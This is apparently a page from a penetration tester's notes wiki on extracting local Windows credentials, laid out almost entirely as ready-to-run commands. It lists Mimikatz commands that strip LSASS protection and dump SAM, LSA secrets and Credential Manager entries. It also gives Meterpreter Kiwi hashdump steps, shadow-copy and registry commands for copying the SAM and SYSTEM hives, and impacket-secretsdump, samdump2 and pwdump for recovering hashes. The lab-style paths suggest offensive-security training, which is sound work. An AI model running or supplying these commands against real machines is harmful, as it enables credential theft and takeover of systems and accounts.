Windows Credentials

PreviousJust-In-Time (JIT) Access NextLocal Administrator Password Solution (LAPS)

Last updated 1 year ago

Windows Credentials

Local

SID in SAM

PowerShell

$env:computername
[wmi] "Win32_userAccount.Domain='',Name='Administrator'"

S-1-5-21--

whoami /user

Mimikatz

privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets

Alternative from LSA

privilege::debug
lsadump::lsa /patch

lsadump::lsa /inject

Meterpreter Kiwi

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

Shadow Copy (admin)

1) cmd

wmic shadowcopy call create Volume='C:\'

2) cmd

vssadmin list shadows

3) cmd

copy \\? C:\users\offsec.corp1\Downloads\sam

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system

Registry (admin)

cmd

reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system

Decrypt

in Kali

impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam

PreviousJust-In-Time (JIT) Access NextLocal Administrator Password Solution (LAPS)

Last updated 1 year ago